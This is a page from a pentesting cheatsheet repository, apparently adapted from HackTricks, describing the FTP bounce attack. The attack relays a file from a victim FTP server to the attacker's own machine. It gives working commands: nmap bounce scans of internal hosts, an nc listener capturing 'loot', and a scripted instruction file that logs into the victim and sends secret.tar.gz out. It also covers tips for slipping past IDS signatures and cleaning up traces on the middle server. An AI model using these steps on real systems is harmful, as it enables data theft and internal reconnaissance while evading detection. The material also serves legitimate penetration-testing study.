daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

ftp-bounce-download-2oftp-file.md (5189B)


      1 ---
      2 title: "FTP Bounce Download 2 of FTP File"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # FTP Bounce Download 2 of FTP File
     14 
     15 ## Resume
     16 
     17 If you have access to a **bounce FTP server**, you can make it request files of **another FTP server** (where you know some credentials) and download that file to **your own server**.
     18 
     19 ## Requirements
     20 
     21 - FTP valid credentials in the **FTP Middle server**
     22 - FTP valid credentials in **Victim FTP server**
     23 - The middle server accepts a **third-party `PORT` destination** (the behavior used by proxy FTP/FTP bounce); the victim accepts the resulting control and data-flow commands.<sup>[[4]](#references)</sup>
     24 - You can **write** inside some directory of the **FTP Middle server**
     25 - The middle server has **more access** inside the Victim FTP Server than you
     26 
     27 ## Steps
     28 
     29 1. Connect to **your own FTP server** and make the connection passive (`pasv` command) so it **listens** in a directory where the victim service will send the file.
     30 2. Craft the file the FTP Middle server will send to the Victim server (the **exploit script**). This file will be plain text with the needed commands to authenticate against the Victim server, change the directory and download a file to your own server.
     31 3. Connect to the **FTP Middle Server** and upload the previous file.
     32 4. Make the FTP Middle server **establish a connection** with the Victim server and send the exploit file.
     33 5. **Capture** the file in your own FTP server.
     34 6. **Delete** the exploit file from the FTP Middle server.<sup>[[3]](#references)</sup>
     35 
     36 ## Quick check for vulnerable bounce hosts
     37 
     38 - **Nmap** still supports FTP bounce checks. Example to verify a potential middle server:<sup>[[1]](#references)</sup>
     39 
     40 ```bash
     41 nmap -Pn -p21 --script ftp-bounce <middle_ftp_ip>
     42 # or directly attempt a bounce scan
     43 nmap -Pn -p80 -b user:pass@<middle_ftp_ip>:21 <internal_target_ip>
     44 ```
     45 
     46 If the server refuses third‑party `PORT` values the scan will fail; some **embedded/legacy printers, NAS and appliance FTP daemons** still allow it.<sup>[[1]](#references)</sup>
     47 
     48 ## Automating the 2nd FTP download
     49 
     50 Below is a modernized way to pull a file through a vulnerable middle FTP server.<sup>[[3]](#references)</sup>
     51 
     52 1. **Open a passive listener** on your attack box (any TCP sink works):
     53    ```bash
     54    nc -lvnp 2121 > loot.bin  # or run a small pyftpdlib server
     55    ```
     56 
     57 2. **Note** your IP as `A,B,C,D` and port `P` as `p1,p2` (`p1 = P/256`, `p2 = P%256`).
     58 
     59 3. **Build the instruction file** that the middle server will replay to the victim:
     60    ```bash
     61    cat > instrs <<'EOF'
     62    USER <victim_user>
     63    PASS <victim_pass>
     64    CWD /path/inside/victim
     65    TYPE I
     66    PORT A,B,C,D,p1,p2
     67    RETR secret.tar.gz
     68    QUIT
     69    EOF
     70    # Add padding so the control channel stays open on picky daemons
     71    dd if=/dev/zero bs=1024 count=60 >> instrs
     72    ```
     73 
     74 4. **Upload & trigger from the middle server** (classic proxy FTP):
     75    ```bash
     76    ftp -n <middle_ftp> <<'EOF'
     77    user <middle_user> <middle_pass>
     78    put instrs
     79    PORT <victim_ip_with_commas>,0,21
     80    RETR instrs
     81    QUIT
     82    EOF
     83    ```
     84 
     85 5. **Grab the file** from your listener (`loot.bin`).
     86 6. **Clean up** the uploaded `instrs` file on the middle server.
     87 
     88 Notes:
     89 - Padding (`dd ...`) prevents the control connection from closing before the RETR finishes (large TCP window issue discussed in classic writeups).<sup>[[3]](#references)</sup>
     90 - Any service that can **listen and dump TCP** can replace the FTP PASV socket (e.g., `socat -u TCP-LISTEN:2121,fork - > loot.bin`).
     91 - If the middle server restricts privileged ports, use a high port in `PORT` and adjust your listener accordingly.
     92 
     93 ## Extra tricks
     94 
     95 - Use a bounceable FTP server to **port-scan internal hosts** when file relay is blocked:<sup>[[2]](#references)</sup>
     96   ```bash
     97   nmap -Pn -p22,80,445 -b anonymous:<email>@<middle_ftp> <internal_ip>
     98   ```
     99 - Some modern WAF/IDS (e.g., Juniper IPS) ship signatures specifically for **FTP:EXPLOIT:BOUNCE-ATTACK**; noisy payloads or missing padding may trip them.
    100 - When the middle server enforces "PORT to same host" restrictions, place your **listener on the middle server itself** (if you have write/execute) and forward the captured file later.
    101 
    102 For a more detailed old-school walkthrough check: [http://www.ouah.org/ftpbounce.html](http://www.ouah.org/ftpbounce.html)<sup>[[3]](#references)</sup>
    103 
    104 ## References
    105 
    106 - [1] [Nmap book – TCP FTP Bounce Scan (-b)](https://nmap.org/book/scan-methods-ftp-bounce-scan.html)
    107 - [2] [CPTS Attacking Common Services – FTP Bounce example (2025)](https://www.chaostudy.com/2025/02/24/cpts-attacking-common-services/)
    108 - [3] [The FTP Bounce Attack](http://www.ouah.org/ftpbounce.html)
    109 - [4] [RFC 959 — FTP `PORT`, data connections, and server-to-server transfer](https://www.rfc-editor.org/rfc/rfc959.html)